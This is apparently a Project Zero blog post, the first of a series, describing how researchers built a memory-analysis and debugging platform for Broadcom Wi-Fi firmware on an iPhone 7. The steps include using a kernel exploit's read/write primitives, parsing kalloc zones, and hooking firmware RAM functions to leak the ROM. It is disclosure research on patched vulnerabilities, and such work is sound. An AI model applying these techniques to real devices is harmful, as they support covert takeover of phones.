Over The Air – Vol. 2, Pt. 1: Exploiting The Wi-Fi Stack on Apple Devices

Posted by Gal Beniamini, Project Zero

Earlier this year we performed research into Broadcom’s Wi-Fi stack. Due to the ubiquity of Broadcom’s stack, we chose to conduct our prior research through the lens of one affected family of products -- the Android ecosystem. To paint a more complete picture of the state of Wi-Fi security in the mobile ecosystem, we’ve chosen to revisit the topic - this time through the lens of Apple devices. In this research we’ll perform a deeper dive into each of the affected components, discover new attack surfaces, and finally construct a full over-the-air exploit chain against iPhones, allowing complete control over the target device.

Since there’s much ground to cover, we’ve chosen to split the research into a three-part blog series. The first blog post will focus on exploring the Wi-Fi stack itself and developing the necessary research tools to explore it on the iPhone. In the second blog post, we’ll perform research into the Wi-Fi firmware, discover multiple vulnerabilities, and develop an exploit allowing attackers to execute arbitrary code on the Wi-Fi chip itself, requiring no user-interaction. Lastly, in the final blog post we’ll explore the iPhone’s host isolation mechanisms, research the ways in which the Wi-Fi chip interacts with the host, and develop a fully-fledged exploit allowing attackers to gain complete control over the iOS kernel over-the-air, requiring no user interaction.

As we’ve mentioned before, Broadcom’s chips are present in a wide variety of devices - ranging from mobile phones to laptops (such as Chromebooks) and even Wi-Fi routers. While we’ve chosen to focus our attention on the Apple ecosystem this time around, it’s worth mentioning that the Wi-Fi firmware vulnerabilities presented in this research affect other devices as well. Additionally, as this research deals with a different attack surface in the Wi-Fi firmware, the breadth of affected devices might be wider than that of our prior research.

More concretely, the Wi-Fi vulnerabilities presented in this research affect many devices in the Android ecosystem. For example, two of the vulnerabilities (#1, #2) affect most of Samsung’s flagship devices, including the Galaxy S8, Galaxy S7 Edge and Galaxy S7. Of the two, one vulnerability is also known to affect Google devices such as the Nexus 6P, and some models of Chromebooks. As for Apple’s ecosystem, while this research deals primarily with iPhones, other devices including the Apple TV and Apple Watch are similarly affected by our findings. The exact breadth of other affected devices has not been investigated further, but is assumed to be wider.

We’d also like to note that until hardware host isolation mechanisms are implemented across the Android ecosystem, every exploitable Wi-Fi firmware vulnerability directly results in complete host takeover. In our previous research we identified the lack of host isolation mechanisms on two of the most prominent SoC platforms; Qualcomm’s Snapdragon 810 and Samsung’s Exynos 8890. We are not aware of any advances in this regard, as of yet.

For the purpose of this research, we’ll demonstrate remote code execution on the iPhone 7 (the most recent iDevice at the time of this research), running iOS 10.2 (14C92). The vulnerabilities presented in this research are present in iOS up to (and including) version 10.3.3 (apart from #1, which was fixed in 10.3.3). Researchers wishing to port the provided research tools and exploits to other versions of iOS or to other iDevices would be required to adjust the referenced symbols.

Over the course of the blog post, we’ll begin fleshing out a memory research platform for iOS. Throughout this blog post series, we’ll rely on this framework extensively to analyse and explore components on the system, including the XNU kernel, hardware components, and the Wi-Fi chipset itself.

The vulnerabilities affecting Apple devices have been addressed in iOS 11. Similarly, those affecting Android have been addressed in the September bulletin. Note that within the Android ecosystem, OEMs bear the responsibility for providing their own Wi-Fi firmware images (partially due to their high level of customisation). Therefore the corresponding fixes should appear in the vendors’ own bulletins, rather than Android’s security bulletin.

Creating a Research Platform

Before we can begin exploring, we’ll need to lay down the groundwork first. Ideally, we’d like to create our own debugger -- allowing us to both inspect and instrument the Wi-Fi firmware, thereby making exploration (and subsequent exploit development) much easier.

During our previous research into Broadcom’s Wi-Fi chip within the context of the Android ecosystem, this task turned out to be much more straightforward than expected. Instead of having to create an entire research environment from scratch, we relied on several properties provided by the Android ecosystem to speed up the development phase.

For starters, many Android devices allow developers to intentionally bypass their security model, using “rooted” builds (such as userdebug). Flashing such a build onto a device allows us to freely explore and interact with many components on the system. As the security model is only bypassed explicitly, the odds of side-effects resulting from our research affecting the system’s behaviour are rather slim.

Additionally, Broadcom provides their own debugging tools to the Android ecosystem, consisting of a command-line utility and a dedicated set of ioctls within Broadcom’s device driver, bcmdhd. These tools allow sufficiently privileged users to interact with the Wi-Fi chip in a variety of ways, including the ability to access the chip’s RAM directly -- an essential primitive when constructing a debugger. Basing our own toolset on this platform allowed us to create a rather comfortable research environment.

Furthermore, Android utilises the Linux Kernel, which is licensed under GPLv2. Therefore, the kernel’s source code, including that of the device drivers, is freely available. Reading through Broadcom’s device driver (bcmdhd) turned out to be an invaluable resource -- sparing us some unnecessary reverse-engineering while also allowing us to easily assess the ways in which the chip and host interact with one another.

Lastly, some of the data sheets pertaining to the Wi-Fi SoCs used on Android devices were made publicly available by Cypress following their acquisition of Broadcom’s IoT business. While most of the information in the data sheets is irrelevant to our research, we were able to gather a handful of useful clues regarding the architecture of the SoC itself.

Unfortunately, it appears we have no such luck this time around!

First, Apple does not provide a “developer-mode” iPhone, nor is there a mechanism to selectively bypass the security model. This means that in order to meaningfully explore the system, researchers are forced to subvert the device’s security model (i.e., by jailbreaking). Consequently, exploring different components within the device is made much more difficult.

Additionally, unlike the Android ecosystem, Apple has chosen to develop their entire host-side stack “from scratch”. Most importantly, the iOS drivers used to interact with Broadcom’s chip are written by Apple, and are not based on Broadcom’s FullMAC drivers (bcmdhd or brcmfmac). Other host-side utilities, such as Broadcom’s debugging toolchain, are thus also not included.

That said, Apple did develop their own mechanisms for accessing and debugging the chip. These capabilities are exposed via a set of privileged ioctls embedded in the IO80211Family driver. While the interface itself is undocumented, reverse-engineering the corresponding components in both the IO80211Family and AppleBCMWLANCore drivers reveals a rather powerful command channel, and one which could possibly be used for the purposes of our research. Unfortunately, access to this interface requires additional entitlements, thus preventing us from leveraging it (unless we escalate our privileges).

Lastly, there’s no overlap between the revisions of Wi-Fi chips used on Apple’s devices and those used in the Android ecosystem. As we’ll see later on, this might be due to the fact that Apple-specific Wi-Fi chips contain Apple-specific features. Regardless, perhaps unsurprisingly, none of the corresponding data sheets for these SoCs have been made available.

So… it appears we’ll have to deal with a proprietary chip, on a proprietary device running a proprietary operating system. We have our work cut out for us! That said, it’s not all doom and gloom; instead of relying on all of the above, we’ll just need to create our own independent research platform.

Acquiring the ROM?

Let’s start by analysing the SoC’s firmware and loading it up into a disassembler. As we’ve seen in the previous round of research, the Wi-Fi firmware consists of a small chunk of ROM containing most of the firmware’s data and code, and a larger blob of RAM housing all of the runtime data structures (such as the heap and stack), as well as patches to the ROM’s code.

Since the RAM blob is loaded into the Wi-Fi chip during its initialisation by the host, it should be accessible via the host’s root filesystem. Indeed, after downloading the iPhone’s firmware image, extracting the root filesystem and searching for indicative strings, we are greeted with the following result:

Great, so we’ve identified the firmware’s RAM. What’s more, it appears that the Wi-Fi chip embedded in the phone is a BCM4355C0, a model which I haven’t come across in Android devices in the past (curiously, it also does not appear on Broadcom’s website).
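As an aside, the string search over the extracted root filesystem can be sketched in a few lines of Python. The marker bytes and the whole-file read are simplifications for illustration; the actual path of the firmware blob on the filesystem is not shown here.

```python
import os

def find_firmware_candidates(root, marker=b"BCM4355"):
    """Walk an extracted root filesystem and return the paths of files
    containing the given marker bytes (e.g. a chip model string).
    Reads each file whole -- fine for a sketch, not for huge trees."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as f:
                    if marker in f.read():
                        hits.append(path)
            except OSError:
                continue  # skip unreadable special files
    return hits
```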

Regardless, having the RAM image is all well and good, but what about the ROM? After all, the majority of the code is stored in the chip’s ROM. Even if we were to settle for analysing the RAM alone, it’d be extremely difficult to reverse-engineer independently of the ROM as many of the functions in the former address data stored in the latter. Without knowing the ROM’s contents, or even its rudimentary layout, we’ll have to resort to guesswork.

However, this is where we run into a bit of a snag! To extract the ROM we’ll need to interact with the Wi-Fi chip itself... Whereas on Android we could simply use a “rooted” build to gain elevated privileges, and then access the Wi-Fi SoC via Broadcom’s debugging utilities, there are no comparable mechanisms on the iPhone. In that case, how will we interact with the chip and ultimately extract its ROM?

We could opt for a hardware-based research environment. Reviewing the data sheets for one of Broadcom’s Wi-Fi SoCs, BCM4339, reveals several interfaces through which the chip may be debugged, including UART and a JTAG interface.

That said, there are several disadvantages to this approach. First, we’d need to open up the device, locate the required interfaces, and make sure that we do not damage the phone in the process. Moreover, requiring such a setup for each research device would cause us to incur significant start-up overhead. Perhaps most importantly, relying on a hardware-based approach would limit the number of researchers who’d be willing to utilise our research platform -- both because hardware work is a relatively specialised skill-set, and since people might (rightly) be wary of causing damage to their own devices.

So what about a completely software-based solution? After all, on Android devices we were able to access the chip’s memory solely using software. Perhaps a similar solution would apply to Apple devices?

To answer this question, let’s trace our way through the Android components involved in the control flow for accessing the Wi-Fi chip’s memory from the host. The flow begins with a user issuing a memory access command via Broadcom’s debugging utility (“membytes”). This, in turn, triggers an ioctl to Broadcom’s driver, requesting the memory access operation. After some processing within the driver, it performs the requested action by directly accessing the chip’s tightly-coupled memory (TCM) from the kernel’s Virtual Address-Space (VAS).

Two Registers Walk Into a BAR

As we’re mostly interested in the latter part, let’s disregard the Android-specific components for now and focus on the mechanism in bcmdhd allowing TCM access from the host.

Reviewing the driver’s code allows us to arrive at the relevant code flow. First, the driver enables the PCIe-connected Wi-Fi chip. Then, it accesses the PCIe Configuration Space to program the Wi-Fi chip’s Base Address Registers (BARs). In keeping with the PCI standards, programming the BARs and mapping them into the host’s address space exposes functionality directly from the Wi-Fi SoC to the host, such as IO-Space or Memory Space access. Taking a closer look at Broadcom’s chips, they seem to provide two BARs in their configuration space; BAR0 and BAR1.

BAR0 is used to map-in registers corresponding to the different cores on the Wi-Fi SoC, including the ARM processor running the firmware’s logic, and more esoteric components such as the PCIe Gen 2 core on the Wi-Fi SoC. The cores themselves can be selected by accessing the PCIe configuration space once again, and programming the “BAR0 Window” register, directing it at the backplane address corresponding to the requested core.

BAR1, on the other hand, is used solely to map the Wi-Fi chip’s TCM into the host. Since Broadcom’s driver leverages the TCM access capability extensively, it maps-in BAR1 into the kernel’s virtual address space during the device’s initialisation, and doesn’t unmap it until the device shuts down. Once the TCM is mapped into the kernel, all subsequent memory accesses to the chip’s TCM are performed by simply modifying the mapped block within the kernel’s VAS. Any write operations made to the memory-mapped block are automatically reflected to the Wi-Fi chip’s RAM.

This is all well and good, but what about iOS? Since Apple develops their own drivers for interacting with Broadcom’s chips, what holds true in Broadcom’s drivers doesn’t necessarily apply to Apple’s drivers. After all, we could think of many different approaches to accessing the chip’s memory. For example, instead of mapping the entire TCM into the kernel’s memory, they might elect to only map-in certain regions of the TCM, to map it only on-demand, or even to rely on different chip-access mechanisms altogether.

To get to the bottom of this, we’ll need to start reverse-engineering Apple’s drivers. This can be done by extracting the kernelcache from the iPhone’s firmware and loading it into our favourite disassembler. After loading the kernel, we immediately come across two driver KEXTs related to Broadcom’s Wi-Fi chip; AppleBCMWLANCore and AppleBCMWLANBusInterfacePCIe.

Spending some time reverse-engineering the two drivers, it’s quickly evident what their corresponding roles are. AppleBCMWLANCore serves as a high-level driver, dealing mostly with configuring the Wi-Fi chip, handling incoming events, and chip-specific features such as offloading. In keeping with good design practices, the driver is unaware of the interface through which the chip is connected, allowing it to focus solely on the logic required to interact with the chip. In contrast, AppleBCMWLANBusInterfacePCIe serves a complementary role; it is a low-level driver tasked with handling all the PCIe-related communication protocols, dealing with MSI interrupts, and generally everything interface-related.

We’ll revisit the two drivers more in-depth later on, but for now it’s sufficient to say that we have a relatively good idea where to start looking for a potential TCM mapping -- after all, as we’ve seen, the TCM access is performed by mapping the PCIe BARs. Therefore, it would stand to reason that such an operation would be performed by AppleBCMWLANBusInterfacePCIe.

After reverse-engineering much of the driver, we come across a group of suspicious-looking functions that appear to be candidates for TCM accessors. All of the above functions serve the same purpose -- accessing a memory-mapped buffer, differing from one another only in the size of the word used (16, 32, or 64-bit). Anecdotally, the corresponding APIs for TCM access in the Android driver follow the same structure. What’s more, the above functions all reference the string “Memory”... We might be onto something!

Kernel Function 0xFFFFFFF006D1D9F0

Cross-referencing our way up the call-chain, it appears that all of the above functions are methods pertaining to instances of a single class, which incidentally bears the same name as that of the driver: AppleBCMWLANBusInterfacePCIe. Since several functions in the call-chain are virtual functions, we can locate the class’s VTable by searching for 64-bit words containing their addresses within the kernelcache.
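The vtable search itself can be sketched as a simple byte scan -- assuming, as the ABI suggests, that the virtual function addresses appear as consecutive little-endian 64-bit words in the kernelcache image. The function addresses and base address below are placeholders.

```python
import struct

def find_vtable(image, base, func_addrs):
    """Scan a raw memory image for a run of 64-bit little-endian words
    matching the given virtual function addresses, and return the virtual
    address of the match. 'base' is the image's load address."""
    needle = b"".join(struct.pack("<Q", a) for a in func_addrs)
    off = image.find(needle)
    return None if off < 0 else base + off
```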

To avoid unnecessary confusion between the object above and the driver, we’ll refer to the object from now on as the “PCIe object”, and we’ll refer to the driver by its full name; “AppleBCMWLANBusInterfacePCIe”.

Kernel Memory Analysis Framework

Now that we’ve identified mechanisms in the kernel possibly relating to the Wi-Fi chip’s TCM, our next course of action is to somehow access them. Had we been able to debug the iOS kernel, we could have simply placed a breakpoint on the aforementioned memory access functions, recorded the location of the shared buffer, and then used our debugger to freely access the buffer on our own. However, as it happens, iOS offers no such debugger. Indeed, having such a debugger would allow users to subvert the device’s security model...

Instead, we’ll have to create our own kernel debugger!

Debuggers usually consist of two main pieces of functionality:
  1. The ability to modify the control flow of the program (e.g., by inserting breakpoints)
  2. The ability to inspect (and modify) the data being processed by the program

As it happens, modifying the kernel’s control flow on modern Apple devices (such as the iPhone 7) is far from trivial. These devices include a dedicated hardware component -- Apple’s Memory Cache Controller (AMCC), designed to prevent attackers from modifying the kernel’s code, even in the presence of full control over the kernel itself (i.e., EL1 code execution). While AMCC might make for an interesting research target in its own right, it’s not the main focus of our research at this time. Instead, we’ll have to make do with analysing and modifying the data processed by the kernel.

To gain access to the kernel, we’ll first need to exploit a privilege escalation vulnerability. Luckily, we can forgo all of the complexity involved in developing a functional kernel exploit, and instead rely on some excellent work by Ian Beer.

Earlier this year, Ian developed a fully-functional exploit allowing kernel code execution from any sandboxed process on the system. Upon successful execution, Ian’s exploit provides two primitives - memory-read and memory-write - allowing us to freely explore the kernel’s virtual address-space. Since the exploit was developed against iOS 10.2, we’ll need to use the same version on our target iPhone to utilise it.

To allow for increased flexibility, we’ll aim to design our research platform to be modular; instead of tying the platform to a specific memory access mechanism, we’ll use Ian’s exploit as a “black-box”, only deferring memory accesses to the exploit’s primitives.

Moreover, it’s important that whatever system we build allows us to explore the device comfortably. Thinking about this for a moment, we can boil it down to a few basic requirements:
  1. The analysis should be done on a developer-friendly machine, not on the iPhone
  2. The platform should be scriptable and easily extensible
  3. The platform should be independent of the memory access mechanism used

To prevent any dependence on the memory access mechanism, we’ll implement a rudimentary command protocol, allowing clients to perform read and write operations, as well as offering an “execute” primitive for gadgets within the kernel’s VAS. Next, we’ll insert a small stub implementing this protocol into the exploit, allowing us to interface with the exploit as if it were a “black box”. As for the client, it can be executed on any machine, as long as it’s able to connect to the server stub and communicate using the above protocol.
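A minimal client for such a protocol might look as follows. The one-byte opcode and fixed-width header shown here are an illustrative wire format, not the one used by the actual server stub.

```python
import socket
import struct

# Hypothetical wire format: 1-byte opcode, 64-bit address, 64-bit length/value.
OP_READ, OP_WRITE, OP_EXEC = 0, 1, 2

class KernelClient:
    """Talks to the server stub embedded in the kernel exploit, treating
    the exploit as a black box providing read/write/execute primitives."""

    def __init__(self, host, port):
        self.sock = socket.create_connection((host, port))

    def _recv_exact(self, n):
        buf = b""
        while len(buf) < n:
            chunk = self.sock.recv(n - len(buf))
            if not chunk:
                raise ConnectionError("server stub closed the connection")
            buf += chunk
        return buf

    def read(self, addr, length):
        self.sock.sendall(struct.pack("<BQQ", OP_READ, addr, length))
        return self._recv_exact(length)

    def write(self, addr, data):
        self.sock.sendall(struct.pack("<BQQ", OP_WRITE, addr, len(data)) + data)

    def execute(self, gadget, arg):
        self.sock.sendall(struct.pack("<BQQ", OP_EXEC, gadget, arg))
        return struct.unpack("<Q", self._recv_exact(8))[0]
```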

A version of Ian Beer’s extra_recipe exploit with the aforementioned server stub can be found on our bug tracker, here.

Lastly, there’s the question of the research platform itself. For convenience’s sake, we’ve decided to develop the framework as a set of Python scripts, not unlike forensics frameworks such as Volatility. We’ll slowly grow the framework as we go along, adding scripts for each new data structure we come across.

Since the iOS kernel relies heavily on dynamic dispatch, the ability to explore the kernel in a shell-like interface allows us to easily resolve virtual call targets by inspecting the virtual pointers in the corresponding objects. We’ll use this ability extensively to assist our static analysis in places where the code is hard to untangle.

Over the course of our research we’ll develop several modules for the analysis framework, allowing interaction with objects within the XNU kernel, parts of IOKit, hardware components, and finally the Wi-Fi chip itself.

Setting Up a Test Network

Moving on, we’ll need to create a segregated test network, consisting of the target iPhone, a single MacBook (which we’ll use to interact with the iPhone), and a Wi-Fi router.

As our memory analysis framework transmits data over the network, both the iPhone and the MacBook must be able to communicate with one another. Additionally, as we’re using Xcode to deploy the exploit from the MacBook to the iPhone, it’d be advantageous if the test network allowed both devices to access the internet (so the developer profile could be verified).

Lastly, we require complete control over all aspects of our Wi-Fi router. This is because the next part of our research will deal extensively with the Wi-Fi layer. As such, we’d like to reserve the ability to inject, modify and drop frames within our network -- primitives which may come in handy later on.

Putting the above requirements together, we arrive at the following basic topology:

In my own lab setup, the role of the Wi-Fi router is fulfilled by my ThinkPad laptop, running Ubuntu 16.04. I’ve connected two SoftMAC TL-WN722N dongles, one for each interface (internal and external). The internal network’s access-point is broadcast using hostapd, and the external interface connects to the internet using wpa_supplicant. Moreover, network-manager is disabled to prevent interference with our configuration.

Note that it’s imperative that the dongle used to broadcast the internal network’s access-point is a SoftMAC device (and not FullMAC) -- this will ensure that the MLME and MAC layers are processed by the host’s software (i.e., by the Linux Kernel and hostapd), allowing us to easily control the data transmitted over those layers.

The laptop is also minimally configured to perform IP forwarding and to serve as a NAT, in order to allow connections from the internal network out into the internet. In addition, I’ve set up both DNS and DHCP servers, to prevent the need for any manual configuration. I also recommend setting up DNS forwarding and blocking Apple’s software-update domains within your network.

Depending on your work environment, it may be the case that many (or most) Wi-Fi channels are rather crowded, thereby reducing the signal quality substantially. While dropping frames doesn’t normally affect our ability to use the network (frames would simply be re-transmitted), it may certainly cause undesirable effects when attempting to run an over-the-air exploit (as re-transmissions may alter the firmware’s state substantially).

Anecdotally, scanning for nearby networks around my desk revealed around 60 Wi-Fi networks, causing quite a bit of noise (and frame loss). If you encounter the same issue, you can boost your RSSI by building a small cantenna and connecting it to your dongle:

Finding the TCM

Using our test network and memory analysis platform, let’s start exploring the kernel’s VAS!

We’ll begin the hunt by searching for the PCIe object within the kernel. After all, we know that finding the object will allow us to locate the suspect TCM mapping, bringing us closer to our goal of developing a Wi-Fi firmware debugger. Since we’re unable to place breakpoints, we’ll need to locate a “path” leading from a known memory location to that of the PCIe object.

So how will we identify the PCIe object once we come across it? Well, while the C++ standards do not explicitly specify how dynamic dispatch is implemented, most compilers tend to use the same ABI for this purpose -- the first word of every object containing virtual functions serves as a pointer to that object’s virtual table (commonly referred to as the “virtual pointer” or “vptr”). By leveraging this little tidbit, we can build our own object identification mechanism; simply read the first word of each object we come across, and check which virtual table it corresponds to. Since we’ve already located the VTable corresponding to the PCIe object we’re after, all we need to do is check each object against that address.
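Expressed in the framework’s terms, the identification check is a one-liner over the memory-read primitive. The vtable address below is a placeholder, not the actual address in the kernelcache.

```python
PCIE_VTABLE = 0xFFFFFFF0075D1E38   # placeholder vtable address

def identify(read64, candidates, vtable=PCIE_VTABLE):
    """Return the candidate addresses whose first 64-bit word (the C++
    virtual pointer) matches the target class's vtable address.
    'read64' is a primitive reading a 64-bit word from kernel memory."""
    return [a for a in candidates if read64(a) == vtable]
```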

Now that we know how to identify the object, we can begin searching for it within the kernel. But where should we start? After all, the object could be anywhere in the kernel’s VAS. Perhaps we can gain some more information by taking a look at the object’s constructor. For starters, doing so will allow us to find out which allocator is used to create the object; if we’re lucky, the object may be allocated from a special pool or stored in a static location.

Kernel Function 0xFFFFFFF006D34734

(OSObject’s “new” operator is a wrapper around kalloc - the XNU kernel allocator).

Looking at the code above, it appears that the PCIe object is not allocated from a special pool. Perhaps, instead, the object is addressable through data stored in the driver’s BSS or data segments? If so, then by following every “chain” of pointers originating in the above segments, we should be able to locate a chain terminating at our desired object.

To test out this hypothesis, let’s write a short Python script to perform a depth-first search for the object, starting in the driver’s BSS and data segments. The script simply iterates over each 64-bit word and checks whether it appears to be a valid kernel virtual address. If so, it recursively continues the search by following the pointer and its neighbouring pointers (searching both forwards and backwards), stopping only when the maximal search depth is reached (or the object is located).
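A sketch of such a search, parameterised over the memory-read primitive, might look as follows. The neighbour-window size and the pointer-validity check are simplified assumptions here; the real script validates candidate words against the kernel’s address ranges.

```python
def dfs_for_object(read64, roots, is_target, is_kernel_ptr,
                   neighbours=16, max_depth=10):
    """Depth-first search for an object, starting from a set of root
    addresses (e.g. every pointer-looking word in the driver's BSS/data
    segments). Each visited address is scanned for neighbouring pointers,
    forwards and backwards, which are followed recursively up to
    'max_depth' levels. Returns the pointer chain to the target, or None."""
    seen = set()

    def visit(addr, depth):
        if depth > max_depth or addr in seen:
            return None
        seen.add(addr)
        if is_target(addr):
            return [addr]
        for i in range(-neighbours, neighbours + 1):
            word = read64(addr + i * 8)
            if is_kernel_ptr(word):
                path = visit(word, depth + 1)
                if path is not None:
                    return [addr] + path
        return None

    for root in roots:
        path = visit(root, 0)
        if path is not None:
            return path
    return None
```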

After running the DFS and following pointers up to 10 levels deep, we find no matching chain. It appears that none of the objects in the BSS or data segments contain a (sufficiently short) pointer chain leading to our target object.

So how should we proceed? Let’s take a moment to consider what we know about the object so far. First, the object is allocated using the XNU kernel allocator, kalloc. We also know the exact size of the allocation (3824 bytes). And, of course, we have a means of identifying the object once located. Perhaps we could inspect the allocator itself to locate the object...

On the one hand, it’s entirely possible that kalloc doesn’t keep track of in-use allocations. If so, tracking down our object would be rather difficult. On the other hand, if kalloc does have a way of identifying past allocations, we can parse its data structures and follow the same logic to identify our object. To get to the bottom of this, let’s download the XNU source code corresponding to this version of iOS, and read through kalloc’s implementation.

After spending some time familiarising ourselves with kalloc’s implementation, we can sketch a high-level view of the allocator’s implementation. Since kalloc is a “zone allocator”, each allocated object is assigned a region from which it is drawn. Individual regions are represented by the zone_t structure, which holds all of the metadata pertaining to the zone.

The allocator’s operation can be roughly split into two phases: identifying the corresponding zone for each allocation, and carving the allocation from the zone. The identification process itself takes on three distinct flows, depending on the size of the requested allocation. Once the target zone is identified, the allocation process proceeds identically for all three flows.

So how are the allocations themselves performed? During zones’ lifetimes, they must keep track of their internal metadata, including the zone’s size, the number of stored elements and many other bits and pieces. More importantly, however, the zone must track the state of the memory pages assigned to it. During the kernel’s lifetime, many objects are allocated and subsequently freed, causing the different zones’ pages to fill up or vacate. If each allocation triggered an iteration over all possible pages while searching for vacancies, kalloc would be quite inefficient. Instead, this is tackled by keeping track of several queues, each denoting the state of the memory pages assigned to the zone.

Among the queues stored in each zone are two queues of particular interest to us:
  • The “intermediate” queue - contains pages with both vacancies and allocated objects.
  • The “all used” queue - contains pages with no vacancies (only filled with objects).

Putting it all together, we can identify allocated objects in kalloc by simply following the same mechanisms as those used by the allocator to locate the target zone. Once we find the matching zone, we’ll parse its queues to locate each allocation made within the zone, stopping only when we reach our target object.
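A simplified version of the zone walk might look as follows. The real module has to parse zone_t and its page queues out of kernel memory, whereas here the page list, page size, and element size are given directly (3824 bytes matches the PCIe object’s allocation size; the rest are illustrative).

```python
def find_in_zone_pages(read64, pages, page_size, elem_size, vtable):
    """Scan the pages queued in a kalloc zone (e.g. the 'intermediate'
    and 'all used' queues), checking the first word of each element slot
    against the target class's vtable address. Returns the address of
    the matching object, or None if no page contains it."""
    for page in pages:
        for off in range(0, page_size - elem_size + 1, elem_size):
            addr = page + off
            if read64(addr) == vtable:
                return addr
    return None
```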

Finally, we can package all of the above into a module in our analysis framework. The module allows us to either manually iterate over zones’ queues, or to locate objects by their virtual table (optionally accepting the allocation size to quickly locate the relevant zone).

Using our new kalloc module, we can search for the PCIe object using the VTable address we found earlier on. After doing so, we are finally greeted with a positive result -- the object is successfully located within the kernel’s VAS! Next, we’ll simply follow the same steps we identified in the memory accessors analysed earlier on, in order to extract the location of the suspected TCM mapping within the kernel.

Since the TCM mapping provides a view into the Wi-Fi chip’s RAM, we’d naturally expect it to begin with the same values as those we had identified in the RAM file extracted from the firmware. Let’s try and read out some of the values from the buffer and see whether it matches the RAM dump:
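Such a sanity check is easy to express in the framework: read a few small windows from the mapped buffer and compare them against the RAM blob. The sample offsets below are arbitrary.

```python
def verify_tcm(read, tcm_base, ram_dump, window=64,
               offsets=(0x0, 0x1000, 0x10000)):
    """Sanity-check a suspected TCM mapping by comparing small windows of
    the mapped buffer against the firmware RAM blob extracted from the
    root filesystem. 'read' is a primitive returning bytes from kernel
    memory; offsets past the end of the blob are skipped."""
    for off in offsets:
        if off + window > len(ram_dump):
            continue
        if read(tcm_base + off, window) != ram_dump[off:off + window]:
            return False
    return True
```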

Great! So we’ve finally found the TCM. This brings us one step closer to acquiring the ROM, and to building a research environment for the Wi-Fi SoC.

Acquiring the ROM

The TCM mapping provides a view into the Wi-Fi chip’s RAM. While accessing the RAM is undoubtedly useful (as it allows us to gain visibility into the runtime structures used by the chip, such as the heap’s state), it does not allow us to directly access the chip’s ROM. So why did we go to all of this effort to begin with? Well, while thus far we have only used the mapped TCM buffer to read the Wi-Fi SoC’s RAM, recall that the same mapping also allows us to freely write to it -- any data written to the memory-mapped buffer is automatically reflected back to the Wi-Fi SoC’s RAM.

Therefore, we can leverage our newly acquired write access to the chip’s RAM in order to modify the chip’s behaviour. Perhaps most importantly, we can insert hooks into RAM-resident functions in the firmware, and direct their flow towards our own code chunks. As we’ve already built a patching infrastructure in the previous blog posts, we can incorporate the same code as a module in our analysis framework!

Doing so allows us to provide a convenient interface through which we simply select a target RAM function and provide a corresponding assembly stub, and the framework then proceeds to patch the function on our behalf, direct it into our shellcode to execute our hook (and emulate the original prologue), and finally return to the original function. The shellcode stub itself is written to the top of the heap’s largest free chunk, allowing us to avoid overwriting any important data structures in the RAM.
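As a small illustration of the patching primitive, here is a hedged helper that computes the branch instruction such a hook would write over the target function's first instruction. It assumes plain ARM (A32) encodings, which may not match the mode the actual firmware function runs in:

```python
def encode_arm_branch(source: int, target: int) -> bytes:
    """Encode an unconditional ARM `B target` instruction to be written
    at address `source`. The 24-bit offset is word-scaled and relative
    to PC, which on ARM points 8 bytes past the current instruction."""
    offset = (target - source - 8) >> 2
    assert -0x800000 <= offset <= 0x7FFFFF, "branch out of range"
    return (0xEA000000 | (offset & 0xFFFFFF)).to_bytes(4, "little")
```

Writing the result through the memory-mapped TCM buffer redirects the patched function into the shellcode stub.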

Building on this technique, let’s insert a hook into a commonly invoked RAM function (such as the chip’s “ioctl” handler). Once invoked, our hook will simply copy small “windows” of the ROM into predetermined regions in RAM. Note that since the RAM is only slightly larger than the ROM, we cannot leak the entire ROM in one go, so we’ll have to resort to this iterative approach instead. Once a ROM chunk is copied, our shellcode stub signals completion, causing the host to subsequently extract the leaked ROM contents and notify the stub that the next chunk of ROM may be leaked.
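The host side of this scheme amounts to a simple polling loop. All the constants and the `tcm` accessor below are hypothetical placeholders for illustration, not values from the actual exploit:

```python
import time

ROM_SIZE     = 0xA0000   # assumed total ROM size to leak
WINDOW_SIZE  = 0x4000    # size of each ROM window copied into RAM
SCRATCH_ADDR = 0x1F0000  # RAM region the hook copies each window into
FLAG_ADDR    = 0x1EFFFC  # completion flag shared with the shellcode stub

def leak_rom(tcm):
    """Drive the ROM-leaking hook: wait for each window to appear, read
    it out, then signal the stub to copy the next one. `tcm` is a
    hypothetical object exposing read(addr, size) / write(addr, data)
    over the memory-mapped TCM buffer."""
    rom = b""
    for _ in range(0, ROM_SIZE, WINDOW_SIZE):
        while tcm.read(FLAG_ADDR, 4) != b"\x01\x00\x00\x00":
            time.sleep(0.01)                       # wait for the hook to fire
        rom += tcm.read(SCRATCH_ADDR, WINDOW_SIZE)  # extract the window
        tcm.write(FLAG_ADDR, b"\x00\x00\x00\x00")   # request the next one
    return rom
```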

Indeed, after inserting the hook and running the scheme detailed above, we are finally presented with a complete copy of the chip’s ROM. Now we can finally move on to analysing the firmware image!

To properly load the firmware into a disassembler, we’ll need to locate the ROM and RAM’s loading addresses, as well as their respective sizes. As we’ve seen in the past, the chip’s ROM is mapped at address zero and spans several KBs. The RAM, on the other hand, is normally mapped at a fixed, higher address.

There are multiple ways in which the RAM’s loading address can be deduced. First, the RAM blob analysed previously embeds its own loading address at a fixed offset. We can verify the address’s validity by attempting to load the RAM at this offset in a disassembler and observing that all the branches resolve correctly. Alternatively, we can extract the loading address from the PCIe object we identified earlier in the kernel, as it contains both attributes as fields.

Regardless, all of the above methods yield the same result -- the RAM is loaded at address 0x160000, and is 0xE0000 bytes long:
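For reference, these values can be captured in a tiny helper that classifies addresses against the recovered memory map. Treating everything below the RAM base as ROM is a simplification here, since the actual ROM may not fill that entire range:

```python
RAM_BASE = 0x160000
RAM_SIZE = 0xE0000

def region(addr: int) -> str:
    """Classify an address against the firmware memory map: ROM is
    mapped at address zero, RAM at RAM_BASE..RAM_BASE+RAM_SIZE."""
    if 0 <= addr < RAM_BASE:
        return "rom"       # simplification: ROM may end before RAM_BASE
    if RAM_BASE <= addr < RAM_BASE + RAM_SIZE:
        return "ram"
    return "unmapped"
```

These bounds are exactly what a disassembler needs to create the two memory segments before loading the ROM and RAM images.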

Building a Wi-Fi Firmware Debugger

Having extracted the ROM and achieved TCM access capabilities, we can also build a module to allow us to easily interact with the Wi-Fi chip. This module will act as a debugger of sorts for the Wi-Fi firmware, allowing us to gain full read/write capabilities to the Wi-Fi firmware, as well as providing several key debugging features.

Among the features present in our debugger are the abilities to inspect the heap’s freelist, execute assembly code chunks directly on the firmware, and even hook RAM-resident functions.

In the next blog post we’ll continue expanding the functionality provided by this module as we go along, resulting in a more complete research framework.

Wrapping Up

